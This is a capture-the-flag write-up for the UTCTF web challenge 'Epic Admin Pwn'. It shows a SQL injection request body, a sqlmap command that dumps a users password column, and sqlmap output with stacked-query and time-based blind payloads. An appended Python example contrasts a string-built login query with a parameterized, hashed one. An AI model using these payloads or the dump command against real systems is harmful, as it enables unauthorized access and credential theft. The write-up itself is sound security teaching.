Epic Admin Pwn
[Web]
epic admin pwn
this challenge is epic i promise
Recon
The login form is vulnerable to blind SQL injection through the pass parameter:
POST / HTTP/1.1
Host: web2.utctf.live:5006
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

username=admin&pass=admin' or 1=1--+
SQLmap
Laziness strikes yet again, so sqlmap does the dumping:
$ python sqlmap.py \
--dbms="postgresql" \
--hex \
--random-agent \
--url "http://web2.utctf.live:5006/" \
--time-sec 2 \
--data="username=admin&pass=admin*" \
-D public -T users -C "password" --dump
[05:18:38] [INFO] target URL appears to be UNION injectable with 3 columns
[...]
---
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=admin&pass=admin';SELECT PG_SLEEP(2)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=admin&pass=admin' AND 3913=(SELECT 3913 FROM PG_SLEEP(2)) AND 'waeR'='waeR
---
[05:40:25] [INFO] fetching number of column(s) 'password' entries for table 'users' in database 'public'
[05:25:54] [INFO] retrieved: 1
[...]
Database: public
Table: users
[1 entry]
+--------------------------+
| password                 |
+--------------------------+
| utflag{dual1pa1sp3rf3ct} |
+--------------------------+
Flag
utflag{dual1pa1sp3rf3ct}
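
The server-side root cause and its fix, as an added example that is not part of the original writeup or the challenge's code: it replays the request body from Recon against a string-built login query and against a parameterized one that stores only a salted hash. SQLite stands in for PostgreSQL here, and the table layout, the users_hardened table, the function names and the sample password are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3
from urllib.parse import parse_qs

# Request body from the Recon section; everything else below is constructed.
BODY = "username=admin&pass=admin' or 1=1--+"
REAL_PASSWORD = "constructed-sample-password"

def hash_pw(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")  # SQLite stand-in for the PostgreSQL backend
    # "Before": plaintext column, like the users.password column sqlmap dumped.
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", REAL_PASSWORD))
    # "After": hypothetical table holding only a salt and a slow hash.
    db.execute("CREATE TABLE users_hardened (username TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users_hardened VALUES (?, ?, ?)",
               ("admin", salt, hash_pw(REAL_PASSWORD, salt)))
    return db

def login_vulnerable(db, username: str, password: str) -> bool:
    # Input is pasted into the SQL text, so a quote ends the literal early
    # and the remainder is parsed as SQL.
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username: str, password: str) -> bool:
    # Placeholders keep input as data; the comparison happens on hashes.
    row = db.execute("SELECT salt, pw_hash FROM users_hardened WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(hash_pw(password, row[0]), row[1])

def replay(body: str = BODY) -> tuple:
    # Decode the form exactly as a server would ("+" becomes a space).
    form = {k: v[0] for k, v in parse_qs(body).items()}
    db = make_db()
    return (login_vulnerable(db, form["username"], form["pass"]),
            login_hardened(db, form["username"], form["pass"]))

if __name__ == "__main__":
    print(replay())  # (vulnerable result, hardened result)
```

With the hashed table, a dump of the credentials column would also no longer return the password itself.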